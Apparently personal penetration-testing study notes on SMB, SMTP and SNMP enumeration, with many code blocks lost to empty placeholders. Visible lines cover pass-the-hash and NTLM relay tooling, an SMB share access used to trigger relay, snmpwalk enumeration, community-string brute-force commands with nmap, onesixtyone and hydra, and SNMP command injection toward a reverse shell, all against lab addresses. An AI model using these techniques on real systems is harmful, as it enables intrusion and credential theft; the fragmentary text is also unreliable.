SMB,SMTP,SNMP enum
SMB attack
tools of manage smb and enum:
enum4linux
CrackMapExec
smbclient
1 |
|
login by hash
1 |
|
-U
set user--pw-nt-hash
use passwd hash
login by passwd
1 |
|
tools of command excute:
impacket-wmiexec
impacket-psexec
use hash
1 |
|
1 |
|
-hashs
use “LMHash:NTHash”,if there was no LM,use 32bit 0- second parameter: “username@ip”
use passwd to get a shell
1 |
|
impacket-ntlmrelayx
smb-relay passwd-hash(u cant crack)no UAC
this module could relay a command to the target use the hash of passwd,if they have the same hash
1 |
|
1 |
|
powershell reverse shell one-liner
1 |
|
https://www.base64encode.org/ encode the liner by utf-16le charset
reverse shell just powershell
1 |
|
--no-http-server
ban http server cause we use smb relay-t
set the target-smb2support
add the support to smb2-c
set the command
in the FILE01 machine1
dir \\192.168.45.210\test
check the dir of smb
1 |
|
net view(Windows)
1 |
|
nbtscan
SMTP
skip!!!
enum
snmp hacktricks
SNMP MIB tree
id | name |
---|---|
1.3.6.1.2.1.25.1.6.0 | System Processes |
1.3.6.1.2.1.25.4.2.1.2 | Running Programs |
1.3.6.1.2.1.25.4.2.1.4 | Processes Path |
1.3.6.1.2.1.25.2.3.1.4 | Storage Units |
1.3.6.1.2.1.25.6.3.1.2 | Software Name |
1.3.6.1.4.1.77.1.2.25 | User Accounts |
1.3.6.1.2.1.6.13.1.3 | TCP Local Ports |
public common string
1 |
|
scan a range:
1 |
|
tools:
snmpwalk:
enume the hole tree
1 |
|
-c
set community string-Oa
This parameter will automatically translate any hexadecimal string into ASCII that was otherwise not decoded.-v1
specify the SNMP version number-t
set the timeout period
enum the users(set OID 1.3.6.1.4.1.77.1.2.25 in the table)enum the process1
snmpwalk -c public -v1 192.168.240.149 1.3.6.1.4.1.77.1.2.25
enum the software installed1
snmpwalk -c public -v1 192.168.240.149 1.3.6.1.2.1.25.4.2.1.2
enum the listening tcp port1
snmpwalk -c public -v1 192.168.240.149 1.3.6.1.2.1.25.6.3.1.2
enum1
snmpwalk -c public -v1 192.168.240.149 1.3.6.1.2.1.6.13.1.3
1
snmpwalk -v 2c -c public 192.168.240.149 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
brute
1
2
3
4msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute 192.168.214.149 --script-args snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.214.149
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.214.149 snmp
RCE in snmp
SNMP RCE hacktricks
if u enum the run-on-read(),it could rce
1 |
|
test:
inject the command
1 |
|
excute it
1 |
|
inject the revserse shellhttps://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/
1 |
|
listen the port and excute it
1 |
|
or exploithttps://github.com/mxrch/snmp-shell
1 |
|
usage:
1 |
|
if u need excute long command like u ssh publickey,u need to run the legacy.py
use a ed25519
SSH publickey, not a RSA
one, it’s shorter.